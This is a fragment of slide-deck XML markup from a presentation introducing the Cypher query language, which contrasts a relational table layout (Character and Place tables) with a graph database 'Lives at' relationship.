            <a:ext cx="8967600" cy="10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Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:rPr>
              <a:t>Cypher is commonly used in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Graph Databases</a:t>
            </a:r>
            <a:endParaRPr sz="6000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3197" name="Google Shape;319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37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78600" y="8575"/>
            <a:ext cx="4427400" cy="11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Relational Database</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3203" name="Google Shape;3203;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="1225800"/>
            <a:ext cx="1457700" cy="2362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204" name="Google Shape;3204;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="1225800"/>
            <a:ext cx="1457700" cy="492900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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Character</a:t>
            </a:r>
            <a:endParaRPr b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05" name="Google Shape;3205;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="1693189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id</a:t>
            </a:r>
            <a:endParaRPr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06" name="Google Shape;3206;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="2160578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place_id</a:t>
            </a:r>
            <a:endParaRPr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07" name="Google Shape;3207;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="2627968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name</a:t>
            </a:r>
            <a:endParaRPr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08" name="Google Shape;3208;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="662975" y="3095357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birth_date</a:t>
            </a:r>
            <a:endParaRPr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09" name="Google Shape;3209;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3051061">
            <a:off x="1105548" y="1824591"/>
            <a:ext cx="235444" cy="230036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210" name="Google Shape;3210;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="1650315"/>
            <a:ext cx="1457700" cy="1895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211" name="Google Shape;3211;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="1650315"/>
            <a:ext cx="1457700" cy="492900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="5F819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Place</a:t>
            </a:r>
            <a:endParaRPr b="1"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12" name="Google Shape;3212;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="2117704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id</a:t>
            </a:r>
            <a:endParaRPr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13" name="Google Shape;3213;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="2585093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name</a:t>
            </a:r>
            <a:endParaRPr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14" name="Google Shape;3214;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2436977" y="3052482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city</a:t>
            </a:r>
            <a:endParaRPr sz="21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15" name="Google Shape;3215;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="3051061">
            <a:off x="2879550" y="2249106"/>
            <a:ext cx="235444" cy="230036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216" name="Google Shape;3216;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="2134988" y="2296426"/>
            <a:ext cx="287674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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="3217" name="Google Shape;3217;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1305100"/>
            <a:ext cx="0" cy="3082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218" name="Google Shape;32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100" y="2462748"/>
            <a:ext cx="1525575" cy="152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9" name="Google Shape;321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8200" y="1076500"/>
            <a:ext cx="1634675" cy="163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0" name="Google Shape;3220;p37"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" rot="10800000">
            <a:off x="6241425" y="2296775"/>
            <a:ext cx="1273500" cy="51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1" name="Google Shape;3221;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="-1390570">
            <a:off x="6142279" y="2045747"/>
            <a:ext cx="1409443" cy="5541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rPr>
              <a:t>Lives at</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:schemeClr val="dk1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3222" name="Google Shape;3222;p37"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4638000" y="14925"/>
            <a:ext cx="4427400" cy="11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Graph</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3000"/>
              <a:t> Database</a:t>
            </a:r>
            <a:endParaRPr sz="3000"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3223" name="Google Shape;3223;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="577962" y="4314050"/>
            <a:ext cx="3424800" cy="809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4" name="Google Shape;3224;p37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5">
            <a:alphaModFix amt="88000"/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="749161" y="4385937"/>
            <a:ext cx="1297707" cy="67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37"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="30498" l="33800" r="36549" t="10316"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2123423" y="4346958"/>
            <a:ext cx="714165" cy="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6" name="Google Shape;322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1971" y="4346952"/>
            <a:ext cx="910643" cy="748446"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3227" name="Google Shape;3227;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5106250" y="4314050"/>
            <a:ext cx="3425700" cy="809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8" name="Google Shape;3228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4523" y="4470315"/>
            <a:ext cx="629370" cy="582743"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3229" name="Google Shape;3229;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711325" y="2383963"/>
            <a:ext cx="1543200" cy="1543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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3230" name="Google Shape;3230;p37"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7522200" y="1091763"/>
            <a:ext cx="1543200" cy="1543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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3231" name="Google Shape;3231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5978" y="4529605"/>
            <a:ext cx="1192251" cy="4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2" name="Google Shape;3232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3198" y="4416713"/>
            <a:ext cx="1192255" cy="689958"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3233" name="Google Shape;323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7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38"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1453675" y="1170125"/>
            <a:ext cx="636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38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="88200" y="1049475"/>
            <a:ext cx="8967600" cy="18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Go Cypher!</a:t>
            </a:r>
            <a:endParaRPr sz="7200"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3240" name="Google Shape;3240;p38"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2402900"/>
            <a:ext cx="9144000" cy="19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/>
              <a:t>Understanding </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="4400">
                <a:solidFill>
                  <a:srgbClr val="1155CC"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cypher Query</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="4400">
              <a:solidFill>
                <a:srgbClr val="1155CC"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3241" name="Google Shape;3241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6" name="Google Shape;3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7" name="Google Shape;324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ater Thesis by Slidesgo">
  <a:themeElements>
    <a:clrScheme name="Simple Light">
      <a:dk1>
        <a:srgbClr val="FFFFFF"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="35B1D6"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="000000"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="51BFDF"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="35B1D6"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="3BAECF"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="70CBE6"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="78D7F1"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="4298B8"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="26647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